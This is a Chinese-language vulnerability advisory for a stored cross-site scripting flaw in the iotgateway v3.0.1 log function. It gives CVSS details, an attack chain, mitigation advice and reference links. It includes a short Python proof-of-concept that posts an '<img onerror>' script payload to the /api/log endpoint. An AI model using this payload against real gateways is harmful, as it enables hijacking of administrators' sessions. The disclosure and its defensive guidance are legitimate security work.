CVE-2026-36906: IoT Gateway日志记录XSS漏洞

漏洞信息

漏洞编号

CVE-2026-36906

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

iotgateway

漏洞概述

iotgateway v3.0.1版本存在跨站脚本攻击（XSS）漏洞。该漏洞位于日志记录功能中，由于未对用户输入进行有效过滤，远程攻击者可注入恶意脚本。当管理员查看日志时，脚本将在浏览器端执行，可能导致敏感信息窃取或会话劫持。

技术细节

该漏洞属于存储型XSS漏洞。漏洞根源在于iotgateway v3.0.1的日志记录模块缺乏严格的输出编码和输入验证机制。攻击者无需经过身份认证（PR:N），即可向日志接口发送包含恶意JavaScript代码的HTTP请求。系统将恶意数据原样存储在日志中。当具有权限的用户（如管理员）访问日志查看页面时，服务器会读取受污染的日志数据并直接渲染到HTML页面中，导致受害者浏览器解析并执行攻击者注入的脚本。由于CVSS向量包含S:C（作用域变更），该漏洞可能利用受害者浏览器访问同一源下的其他敏感数据。

攻击链分析

STEP 1

1. 信息收集

攻击者识别并定位目标iotgateway服务，确认版本为v3.0.1。

STEP 2

2. 恶意注入

攻击者向日志记录接口发送包含XSS Payload的HTTP请求，Payload被存储在系统日志中。

STEP 3

3. 诱导访问

等待或诱导管理员/用户登录系统并访问日志展示页面。

STEP 4

4. 代码执行

受害者的浏览器加载日志页面时解析Payload，执行恶意JavaScript代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-36906
# Target: iotgateway v3.0.1 Log Record Function

target = "http://192.168.1.100:8080"
payload = "<img src=x onerror=alert('XSS')>"

# Sending payload to the log endpoint
headers = {"Content-Type": "application/json"}
data = {"log": payload}

try:
    r = requests.post(f"{target}/api/log", json=data, headers=headers)
    if r.status_code == 200:
        print("[+] Payload injected successfully. Check the admin log page.")
    else:
        print(f"[-] Request failed with status code: {r.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

iotgateway v3.0.1

防御指南

临时缓解措施

建议立即对所有日志输出内容进行严格的HTML实体编码，确保将特殊字符（如 <, >, &, ', "）转换为HTML实体。此外，应限制对日志查看页面的访问权限，仅允许受信任的IP地址或经过强身份验证的管理员访问，以减少潜在的攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36906
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36906
3 Details https://www.cvedetails.com/cve/CVE-2026-36906/
4 VulDB https://vuldb.com/cve/CVE-2026-36906
5 Link http://iotgateway.com
6 Link http://iotgateway.net/
7 Link https://github.com/iioter/iotgateway/issues/59
8 Link https://github.com/iioter/iotgateway/issues/59